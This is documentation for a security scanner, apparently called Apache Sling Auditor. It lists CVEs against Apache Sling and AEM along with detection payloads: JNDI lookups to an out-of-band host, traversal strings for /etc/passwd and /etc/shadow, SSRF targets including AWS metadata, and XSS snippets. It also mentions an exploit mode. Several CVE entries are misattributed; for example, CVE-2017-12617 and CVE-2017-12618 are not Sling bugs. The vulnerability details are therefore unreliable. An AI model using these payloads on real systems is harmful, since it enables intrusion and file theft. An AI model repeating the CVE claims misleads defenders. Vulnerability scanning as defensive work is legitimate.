CVE Detection
Apache Sling Auditor includes automated detection for multiple known CVEs affecting Apache Sling and AEM.
Supported CVEs
Critical Severity
CVE-2021-44228 (Log4Shell)
Type: Remote Code Execution (RCE)
Severity: Critical
Affected Versions: Log4j < 2.15.0
Description:
Remote code execution vulnerability in Apache Log4j2 via JNDI lookup. This is one of the most critical vulnerabilities affecting Java applications.
Detection Method:
- Out-of-Band (OOB) testing via DNS/LDAP/RMI
- Multiple injection points (headers, parameters)
- Response time analysis
- Pattern detection
Injection Points:
- 15+ HTTP headers (X-Forwarded-For, User-Agent, etc.)
- 10+ URL parameters
- Multiple payload variants
Payloads:
1
${jndi:ldap://oob-domain.com/a}1
${jndi:dns://oob-domain.com}- Obfuscated variants
Test Paths:
1
/system/console
1
/bin/querybuilder.json
1
/system/console/status-slingsettings.json
Remediation:
Update to Log4j 2.15.0 or higher, or apply mitigation by setting 1
log4j2.formatMsgNoLookups=true
CVE-2017-12617 (Path Traversal)
Type: Path Traversal
Severity: Critical
Affected Versions: Apache Sling < 9.0
Description:
Path traversal vulnerability allowing unauthorized file system access.
Detection Method:
- File system access testing
- Multiple encoding variants
- Response analysis for file content
Payloads:
1
../../../etc/passwd
1
..%2F..%2F..%2Fetc%2Fpasswd
- Double encoding variants
Exploitation:
Attempts to read sensitive files:
1
/etc/passwd
1
/etc/shadow
- Application configuration files
Remediation:
Update to Apache Sling 9.0 or higher.
High Severity
CVE-2020-11987 (SSRF)
Type: Server-Side Request Forgery
Severity: High
Affected Versions: Apache Sling < 11.4
Description:
Server-Side Request Forgery vulnerability in Sling servlets allowing access to internal resources.
Detection Method:
- Internal resource access testing
- Response analysis for internal content
- Multiple payload variants
Payloads:
1
http://127.0.0.1:4502
1
http://localhost/system/console
1
file:///etc/passwd
- AWS metadata endpoints
Exploitation:
Tests access to:
- Localhost services
- File system
- AWS metadata endpoints
- Internal network resources
Remediation:
Update to Apache Sling 11.4 or higher.
CVE-2017-12618 (SSRF)
Type: Server-Side Request Forgery
Severity: High
Affected Versions: Apache Sling < 9.0
Description:
SSRF vulnerability in Sling servlets.
Remediation:
Update to Apache Sling 9.0 or higher.
Medium Severity
CVE-2018-12809 (XSS)
Type: Cross-Site Scripting
Severity: Medium-High
Affected Versions: Apache Sling < 10.0
Description:
Cross-site scripting vulnerability in Query Builder API.
Detection Method:
- Payload injection into parameters
- Response analysis for reflection
- Multiple payload variants
Payloads:
1
<img src=x onerror=alert(1)>
1
javascript:alert(document.domain)
1
<script>alert(1)</script>
Test Parameters:
1
property
1
value
1
q
Exploitation:
Generates HTML PoC files demonstrating XSS.
Remediation:
Update to Apache Sling 10.0 or higher.
CVE-2019-8086 (Information Disclosure)
Type: Information Disclosure
Severity: Medium
Affected Versions: Apache Sling < 11.0
Description:
Information disclosure through error messages and system endpoints.
Detection Method:
- Pattern matching in responses
- System property extraction
- Error message analysis
Check Patterns:
1
java.version
1
os.name
1
user.home
1
java.home
Test Paths:
1
/system/console/status-slingsettings.json
1
/system/console/status-systemproperties.json
1
/system/console/bundles.json
Exploitation:
Extracts:
- Java version information
- Operating system details
- System properties
- User information
Remediation:
Update to Apache Sling 11.0 or higher.
CVE-2020-11984 (Path Traversal)
Type: Path Traversal
Severity: Medium
Affected Versions: Apache Sling < 11.4
Description:
Path traversal vulnerability in specific endpoints.
Remediation:
Update to Apache Sling 11.4 or higher.
CVE-2020-11985 (Path Traversal)
Type: Path Traversal
Severity: Medium
Affected Versions: Apache Sling < 11.4
Description:
Path traversal vulnerability in specific endpoints.
Remediation:
Update to Apache Sling 11.4 or higher.
CVE-2020-11986 (XSS)
Type: Cross-Site Scripting
Severity: Medium
Affected Versions: Apache Sling < 11.4
Description:
XSS vulnerability in specific components.
Remediation:
Update to Apache Sling 11.4 or higher.
Additional CVEs
CVE-2016-0957 (XSS)
Type: Cross-Site Scripting
Severity: Medium
Affected Versions: Apache Sling < 8.0
Remediation:
Update to Apache Sling 8.0 or higher.
CVE-2018-8013 (Information Disclosure)
Type: Information Disclosure
Severity: Medium
Affected Versions: Apache Sling < 9.0
Remediation:
Update to Apache Sling 9.0 or higher.
Detection Methods
1. Generic Detection
For generic CVEs, the auditor:
- Tests specified paths
- Injects payloads into parameters/headers
- Analyzes responses for indicators
- Checks for error messages
2. XSS Detection
Specialized XSS detection:
- Injects XSS payloads
- Checks for reflection in responses
- Analyzes response headers
- Generates PoC files
3. SSRF Detection
Specialized SSRF detection:
- Tests internal resource access
- Analyzes responses for internal content
- Checks for file system access
- Tests AWS metadata endpoints
4. Path Traversal Detection
Specialized path traversal detection:
- Tests file system access
- Uses multiple encoding variants
- Checks for sensitive file content
- Attempts file reading
5. Information Disclosure Detection
Specialized information disclosure detection:
- Pattern matching in responses
- Extracts system information
- Analyzes error messages
- Identifies sensitive data exposure
Detection Accuracy
The auditor uses multiple techniques to reduce false positives:
- Response Analysis: Detailed analysis of HTTP responses
- Pattern Matching: Specific patterns for vulnerability indicators
- Time Analysis: Response time analysis for OOB tests
- Multiple Payloads: Testing with various payload variants
- Encoding Variants: Testing with different encodings
False Positives
To reduce false positives:
- Use Stealth Mode: More accurate but slower
- Review Configuration: Adjust detection patterns
- Manual Verification: Verify findings manually
- Exploitation Mode: Use
1
--exploit
Adding Custom CVEs
See the Configuration Guide for instructions on adding custom CVEs.
CVE Summary Table
| CVE | Type | Severity | Affected Versions |
|---|---|---|---|
| CVE-2021-44228 | RCE | Critical | Log4j < 2.15.0 |
| CVE-2017-12617 | Path Traversal | Critical | Sling < 9.0 |
| CVE-2020-11987 | SSRF | High | Sling < 11.4 |
| CVE-2017-12618 | SSRF | High | Sling < 9.0 |
| CVE-2018-12809 | XSS | Medium | Sling < 10.0 |
| CVE-2019-8086 | Info Disclosure | Medium | Sling < 11.0 |
| CVE-2020-11984 | Path Traversal | Medium | Sling < 11.4 |
| CVE-2020-11985 | Path Traversal | Medium | Sling < 11.4 |
| CVE-2020-11986 | XSS | Medium | Sling < 11.4 |
| CVE-2016-0957 | XSS | Medium | Sling < 8.0 |
| CVE-2018-8013 | Info Disclosure | Medium | Sling < 9.0 |
Want to exploit these? Check out the Exploitation Guide!